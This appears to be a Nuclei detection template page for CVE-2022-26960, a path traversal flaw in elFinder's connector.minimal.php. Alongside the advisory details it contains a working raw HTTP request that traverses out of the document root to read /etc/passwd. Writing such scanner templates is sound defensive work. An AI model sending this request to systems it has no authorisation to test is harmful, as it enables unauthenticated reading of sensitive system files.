Skip to content

elFinder <=2.1.60 - Local File Inclusion

ID: CVE-2022-26960

Severity: critical

Author: pikpikcu

Tags: cve2022,cve,lfi,elfinder,std42

elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.

id: CVE-2022-26960
info:
name: elFinder <=2.1.60 - Local File Inclusion
author: pikpikcu
severity: critical
description: |
elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
remediation: |
Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability.
reference:
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
- https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
- https://www.synacktiv.com/publications.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2022-26960
cwe-id: CWE-22
epss-score: 0.84507
epss-percentile: 0.98501
cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: std42
product: elfinder
tags: cve2022,cve,lfi,elfinder,std42
http:
- raw:
- |
GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402205d92487e445c0d3570b9a8fbc3210a3223955ab5fb584c80861817a2ec1c811602203412e6b232fbfd95c5dce83a8bfb3f009889b2f0c86033d5357a5644cf740a8e:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-26960.yaml"

View on Github